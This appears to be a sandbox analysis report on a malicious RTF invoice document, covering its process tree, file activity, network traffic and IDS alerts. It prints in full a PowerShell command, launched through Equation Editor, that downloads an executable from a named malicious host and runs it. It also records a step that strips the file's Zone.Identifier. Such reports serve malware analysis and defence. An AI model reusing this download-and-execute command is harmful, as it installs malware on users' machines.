File name: | 2190987295 inv&PL for payment.doc |
Full analysis: | https://app.any.run/tasks/da05c96b-25bc-49d8-83ba-db02057d61ab |
Verdict: | Malicious activity |
Analysis date: | July 17, 2019, 15:12:20 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/rtf |
File info: | Rich Text Format data, version 1, unknown character set |
MD5: | B3A482D5C524FD0F0E86DF2E9066F3BA |
SHA1: | 2611939B76ADEE15C3BD74DB8641CDFA9C1142D0 |
SHA256: | 0F6E814309DE01F579C45243A3F994A41AE146470605E484727C2306EC8DF099 |
SSDEEP: | 96:GvpYJqKkZ4gZeZHZMZ7YhGxZUZEZaZNZVZoLZbZ9ZXZOZ5Z6ZeZHZMZyYZeZHZM8:TNC48YhGvH2sHsy9GFYs |
.rtf | | | Rich Text Format (100) |
---|
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3472 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\2190987295 inv&PL for payment.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3668 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | svchost.exe | |
User: admin Company: Design Science, Inc. Integrity Level: MEDIUM Description: Microsoft Equation Editor Exit code: 0 Version: 00110900 | ||||
2352 | cmd.exe /c PowerShell "try{$fRt=$env:temp+'\C.exe';Import-Module BitsTransfer;Start-BitsTransfer -Source 'http://peveyhack.com/css/page/see.exe' -Destination $fRt;(New-Object -com Shell.Application).ShellExecute( $fRt);}catch{}" | C:\Windows\system32\cmd.exe | — | EQNEDT32.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2800 | PowerShell "try{$fRt=$env:temp+'\C.exe';Import-Module BitsTransfer;Start-BitsTransfer -Source 'http://peveyhack.com/css/page/see.exe' -Destination $fRt;(New-Object -com Shell.Application).ShellExecute( $fRt);}catch{}" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3144 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | — | svchost.exe |
User: admin Company: Design Science, Inc. Integrity Level: MEDIUM Description: Microsoft Equation Editor Exit code: 0 Version: 00110900 | ||||
3712 | "C:\Users\admin\AppData\Local\Temp\C.exe" | C:\Users\admin\AppData\Local\Temp\C.exe | — | powershell.exe |
User: admin Integrity Level: MEDIUM Description: Exit code: 0 Version: 0.0.0.0 | ||||
840 | "C:\Windows\System32\cmd.exe" /C type nul > "C:\Users\admin\AppData\Local\Temp\C.exe:Zone.Identifier" | C:\Windows\System32\cmd.exe | — | C.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2828 | "C:\Windows\System32\cmd.exe" /C type nul > "C:\Users\admin\AppData\Local\Temp\C.exe:Zone.Identifier" | C:\Windows\System32\cmd.exe | — | C.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3548 | "C:\Users\admin\AppData\Local\Temp\C.exe" | C:\Users\admin\AppData\Local\Temp\C.exe | — | C.exe |
User: admin Integrity Level: MEDIUM Description: Version: 0.0.0.0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3472 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRE987.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2800 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MP8LIYQXXOXQEEF1BT6Y.temp | — | |
MD5:— | SHA256:— | |||
3472 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:4A940B0EB7813A577FC697A20F4AA1E7 | SHA256:FDEDCB8C518AD29752CCC1FA87D523F7498CAADE24F16AAE91652B3E3E387953 | |||
2800 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:4B92A079D7F4DFA0DFE9125E60FE7814 | SHA256:E96B52BC25AE8BA162760C1F5159606ED78EB1EC4CBA0F98AAD2915AE22D8E04 | |||
2800 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF10f1a5.TMP | binary | |
MD5:4B92A079D7F4DFA0DFE9125E60FE7814 | SHA256:E96B52BC25AE8BA162760C1F5159606ED78EB1EC4CBA0F98AAD2915AE22D8E04 | |||
3472 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$90987295 inv&PL for payment.doc | pgc | |
MD5:EBD3F5E5CB4B97921CEAD2A25F178854 | SHA256:AD56AA25D0D55EB58712EF9062CBDA8D65442167F65DD9E548A834A067DA10B2 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
— | — | HEAD | 200 | 103.6.196.175:80 | http://peveyhack.com/css/page/see.exe | MY | — | — | malicious |
— | — | GET | 200 | 103.6.196.175:80 | http://peveyhack.com/css/page/see.exe | MY | executable | 625 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
— | — | 103.6.196.175:80 | peveyhack.com | Exa Bytes Network Sdn.Bhd. | MY | malicious |
Domain | IP | Reputation |
---|---|---|
peveyhack.com |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
— | — | Potentially Bad Traffic | ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile |
— | — | Potentially Bad Traffic | ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile |
— | — | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |